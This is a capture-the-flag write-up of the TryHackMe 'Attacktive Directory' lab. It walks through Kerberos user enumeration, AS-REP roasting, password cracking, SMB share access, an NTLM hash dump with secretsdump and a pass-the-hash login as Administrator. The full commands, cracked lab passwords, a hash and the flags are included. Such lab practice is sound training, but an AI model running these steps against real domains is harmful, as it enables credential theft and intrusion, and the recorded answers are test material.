TRYHACKME ATTACKTIVE DIRECTORY ROOM WRITE-UP
On connection
Running nmap to view open ports and services
Add the dns domain name to the /etc/hosts then access the IP via the browser
On the browser:
This IIS from Microsoft
Try to enumerate any user using the enum4linux tool
We got nothing
Installing the tool kerbrute for enumeration
The above shows different commands used for the tool to enumerate different items e.g. users through userenum, — dc <ip address> -d <domain name> and a list of common usernames.
Command:
./kerbrute_linux_amd64 userenum — dc 10.10.61.114 -d spookysec.local userlist.txt
The tool provides us with different usernames matching the userlist.txt
We can now use the tool impacket to enumerate users as well as do ASREPRoasting.
ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
The script is GetNPUsers.py
Command: GetNPUsers.py spookysec.local/ -usersfile userenum.txt -format hashcat -outputfile ./getnpusers -dc-ip 10.10.61.114
Checking the content of the output file
We identify that only the user svc-admin is susceptible to ASReproasting
We then make use of hashcat to crack the hash and get the password
Password = management2005
Alternatively, one can use john the ripper to crack, much simpler
Get SMB shares using SMB client tool
Command: smbclient -L 10.10.61.114\\ -U svc-admin
When prompted for password, use the one we found above for svc-admin user
Try to access the shares one by one to find out which one you are allowed to access. In this case, we are allowed to access the backup share
Command: smbclient -U svc-admin //10.10.61.114/backup
Use command more to read the content of the file
Output:
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decode in base64 to get the password
Command: echo “YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw” | base64 -d
User is backup password is backup@spookysec.local and the password is backup2517860
Dump the hashes for all users.
Command : secretsdump.py spookysec.local/backup:’backup2517860'@10.10.61.114 -just-dc-ntlm
Interesting user and hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
We can now use evil-winrm to login to the user without having to crack the hashes
Command : evil-winrm -i 10.10.61.114 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Now logged in, find out where you are in the system.
Navigate through and look for the flag
Its in the desktop directory under a filename root.txt
Flag for administrator= TryHackMe{4ctiveD1rectoryM4st3r}
Move to the users directory and get to each user’s directory to find the flags
Flag for svc-admin = TryHackMe{K3rb3r0s_Pr3_4uth}
Flag for backup = TryHackMe{B4ckM3UpSc0tty!}
Have fun!!